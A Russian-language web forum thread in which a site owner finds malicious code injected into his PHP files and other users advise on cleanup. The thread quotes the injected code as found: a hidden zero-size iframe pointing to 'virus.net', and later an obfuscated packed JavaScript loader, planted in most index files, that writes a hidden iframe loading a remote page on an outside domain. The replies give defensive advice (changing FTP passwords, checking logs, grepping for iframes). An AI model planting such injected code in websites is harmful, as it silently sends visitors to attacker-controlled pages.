Гость
Целевая тема:
Создать новую тему:
Автор:
Форумы / PHP, Perl, Python [игнор отключен] [закрыт для гостей] / Вирусный iframe в php / 12 сообщений из 12, страница 1 из 1
16.11.2014, 12:49
    #38807427
RedRa
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Вирусный iframe в php
Захожу утром на сайт, открываю страничку, а меня перекидывает, чёрт знает на какой сайт, каких-то продаж. Смотрю код страницы, там iframe тег, сперва подумал в MySQL через добовление поста добавили, потом открыл исходник файла, смотрю а этот код в самом исходнике записан, хотя его там 100% не было!

Чисто:
Код: php
1.
echo '<tag5479></tag5479><iframe width="0" height="0" board="0" src="virus.net"></iframe><tag5479></tag5479>';



Удалил, но думаю опять появиться, возможно в другом месте, что делать? Как с этим бороться?
...
Рейтинг: 0 / 0
16.11.2014, 13:02
    #38807432
vkle
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Вирусный iframe в php
Проверить на наличие троянов все компы, откуда работали с сайтом. Ну и полечить их, если необходимо.
Сменить пароли (фтп, шелл, админка и т.п.).
Установить все обновления безопасности для движка и используемых компонентов...
В общем, обычные мероприятия по безопасности.

Кроме того, следует найти и удалить из директорий сайта "неизвестно откуда взявшиеся" файлы, где запросто может быть спрятан какой-нить пхп-шелл. Файлы, маскирующиеся под картинки, стили и т.п. при проверке исключением не являются.
Как вариант, можно "грохнуть всё" и развернуть гарантировано чистую резервную копию сайта. Именно развернуть на пустом месте, а не поверх существующего.
...
Рейтинг: 0 / 0
16.11.2014, 13:11
    #38807439
RedRa
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Вирусный iframe в php
vkle,

Логично!

Надо будет возиться ещё и с этим..

Тут у меня есть папки cache, в которых бывает по 150-200 тыс файлов php, просто эту папку открывать сложно, а если ещё и удалять..


p.s Что-то мне не весело.
...
Рейтинг: 0 / 0
16.11.2014, 14:31
    #38807471
vkle
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Вирусный iframe в php
RedRaесть папки cache, в которых бывает по 150-200 тыс файловСама по себе организация кеша неверна. При большом количестве файлов сама длина каталога становится большой, что сильно снижает скорость доступа к файлам. Ну и кеш отчасти теряет свое основное назначение - ускорить отдачу контента. По хорошему, при таких объемах следует строить дерево, ограничивая число элементов директории максимум несколькими тысячами.
...
Рейтинг: 0 / 0
16.11.2014, 14:48
    #38807476
RedRa
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Вирусный iframe в php
vkleRedRaесть папки cache, в которых бывает по 150-200 тыс файловСама по себе организация кеша неверна. При большом количестве файлов сама длина каталога становится большой, что сильно снижает скорость доступа к файлам. Ну и кеш отчасти теряет свое основное назначение - ускорить отдачу контента. По хорошему, при таких объемах следует строить дерево, ограничивая число элементов директории максимум несколькими тысячами.

Знаю, просто когда делал, планировал разбить на части по датам и тд. Но пока что-то руки не дошли...(
...
Рейтинг: 0 / 0
16.11.2014, 20:02
    #38807644
мой пароль
Гость
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Вирусный iframe в php
RedRavkleпропущено...
Сама по себе организация кеша неверна. При большом количестве файлов сама длина каталога становится большой, что сильно снижает скорость доступа к файлам. Ну и кеш отчасти теряет свое основное назначение - ускорить отдачу контента. По хорошему, при таких объемах следует строить дерево, ограничивая число элементов директории максимум несколькими тысячами.

Знаю, просто когда делал, планировал разбить на части по датам и тд. Но пока что-то руки не дошли...(

Все правильно - вот тебе батя веничком и приложил, чтоб ручки быстрее из правильного места росли.
...
Рейтинг: 0 / 0
16.11.2014, 22:06
    #38807683
RedRa
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Вирусный iframe в php
мой парольRedRaпропущено...


Знаю, просто когда делал, планировал разбить на части по датам и тд. Но пока что-то руки не дошли...(

Все правильно - вот тебе батя веничком и приложил, чтоб ручки быстрее из правильного места росли.

Ну я просто в тот момент когда делал кеш, ничего умного не придумал, был вариант, удалять все файлы при достижения определённого лимита, или просто создавать новую папку, а старую заменять и тд.
Много чего думал, но так и оставил, файлы чисто перезаписываются, раз в неделю кажется, но в целом папка всегда переполнена.


Что посоветуете, есть какие нибудь готовые схемы-чертежи, как это правильней реализовывать?
...
Рейтинг: 0 / 0
17.11.2014, 19:00
    #38808743
alex564657498765453
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Вирусный iframe в php
ктото может обяснить, почему имено так вставили

<tagxxx></tagxxx><iframe /><tagxxx></tagxxx>

Зачем в эти псевдотеги обернули???

я понимаю что чтото обманывали, но что? и как?
...
Рейтинг: 0 / 0
17.11.2014, 19:19
    #38808763
Вирусный iframe в php
alex564657498765453ктото может обяснить, почему имено так вставили

<tagxxx></tagxxx><iframe /><tagxxx></tagxxx>

Зачем в эти псевдотеги обернули???

я понимаю что чтото обманывали, но что? и как?

Чтобы бот несколько раз iframe в файл не вставлял.
...
Рейтинг: 0 / 0
24.11.2014, 18:10
    #38815452
RedRa
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Вирусный iframe в php
Во, сегодня что обнаружил, почти во всех index файлах.


Код: javascript
1.
<tag5479></tag5479><script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" f=\\"0\\" c=\\"d://h.j/m.l\\">";1 5="<9";1 8="n";1 4="e";1 a="</9";1 7="e>";3.2(5);b(3.2(8+4+k+a),6);b(3.2(4+7),6);',24,24,'|var|write|document|k02|k0|1000|k22|k01|if|k2|setTimeout|src|http||board|height|advantageinteractive|width|biz||php|tag4|ram'.split('|'),0,{}))</script><tag5479></tag5479>





p.s Пока пароли от ftp не менял, но наверно уже сегодня-завтра придётся поменять. Потому что вирус перезаписывается, я так понял раз в сутки. Посторонних файлов не обнаружил, так бегло просмотрел, лишнего вроде ничего нет, в кеш папках не смотрел, их проще удалить все, чем в них рыться.
...
Рейтинг: 0 / 0
24.11.2014, 19:14
    #38815511
vkle
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Вирусный iframe в php
RedRaВо, сегодня что обнаружил, почти во всех index файлах.Распихать код по многим файлам - обычное дело... Только код этот тут вряд ли кому пригодится.

RedRaпароли от ftp не менялПосмотрите логи ФТП. Если там увидите чужой вход - меняйте обязательно.
Еще посмотрите access-логи вебсервера на наличие POST-запросов, совпадающих по времени с модификацией проблемных файлов.

RedRaвирус перезаписывается, я так понял раз в суткиРоботу пофик, сколько раз за сутки заходить и делать свое черное дело. Может хоть каждые три минуты.
...
Рейтинг: 0 / 0
24.11.2014, 19:35
    #38815528
Valerii_me
Гость
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Вирусный iframe в php
RedRa, пару дней назад была та-же самая трабла. "Прогонщик" с форума серча залил мне шел через FTP я его спалил (ваше решение) по дате модификации файлов.

В вашем случае может еще быть:
посмотрите не открыт ли mysql порт в наружку
еще раз поменяйте пароли FTP и в дальнейшем конектитесь к сайту с LiveCD, например Ubuntu
на Linux или вручную на Win проверьте все файлы в том числе и экспорт базы, например так
$grep iframe -ir /my_folder_site_export/

если что могу помочь бесплатно - кричите в почту (слитно) ss ere nkii гав gmail
...
Рейтинг: 0 / 0
Форумы / PHP, Perl, Python [игнор отключен] [закрыт для гостей] / Вирусный iframe в php / 12 сообщений из 12, страница 1 из 1
Найденые пользователи ...
Разблокировать пользователей ...
Читали форум (0):
Пользователи онлайн (0):
x
x
Закрыть


Просмотр
0 / 0
Close
Debug Console [Select Text]